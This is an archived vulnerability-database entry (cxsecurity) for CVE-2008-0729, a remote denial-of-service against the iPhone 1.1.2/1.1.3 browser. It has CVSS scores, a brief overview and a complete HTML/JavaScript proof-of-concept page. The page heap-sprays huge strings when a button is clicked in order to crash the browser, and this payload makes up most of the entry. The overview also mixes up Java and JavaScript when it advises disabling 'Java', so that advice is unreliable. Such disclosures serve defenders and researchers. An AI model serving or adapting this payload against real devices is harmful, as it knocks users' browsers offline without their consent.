Bug: Apple iPhone 1.1.3 remote DoS exploit ( Ascii Version )

Search:
WLB2

Apple iPhone 1.1.3 remote DoS exploit

Published
Credit
Risk
2008.02.12
Joshua Morin
Medium
CWE
CVE
Local
Remote
CWE-399
CVE-2008-0729
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.1/10
6.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
None
None
Complete

Vendor: Apple

Version affected: 1.1.2 and 1.1.3

Overview:The Apple iPhone remote DoS for 1.1.2 was discovered by c0ntex, but it actually works on 1.1.3 as well. After
further research it also appears that this was a known issue with Firefox version 1.5.04 and was effected
cross-platform.

Called Mozilla Firefox JavaScript navigator Object Vulnerability.I recommend you disable Java until Apple releases a fix
or patch.

___________________________________

Proof of Concept (PoC):

<html><body><script>

function Demo() {

var shellcode;

var addr;

var fill;

alert('attempting a crash!');

shellcode = unescape('%u0c0c');

fill = unescape('%ucccc');

addr = 0x02020202;

var b = fill;

while (b.length <= 0x40000) b+=b;

var c = new Array();

for (var i =0; i<36; i++) {

c[i] =

b.substring(0, 0x100000 - shellcode.length) + shellcode +

b.substring(0, 0x100000 - shellcode.length) + shellcode +

b.substring(0, 0x100000 - shellcode.length) + shellcode +

b.substring(0, 0x100000 - shellcode.length) + shellcode;

}

}

</script>

<input type='button' onClick='Demo()' value='Go!'>

</body></html>

_________________________________________

Discovered by Joshua Morin

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version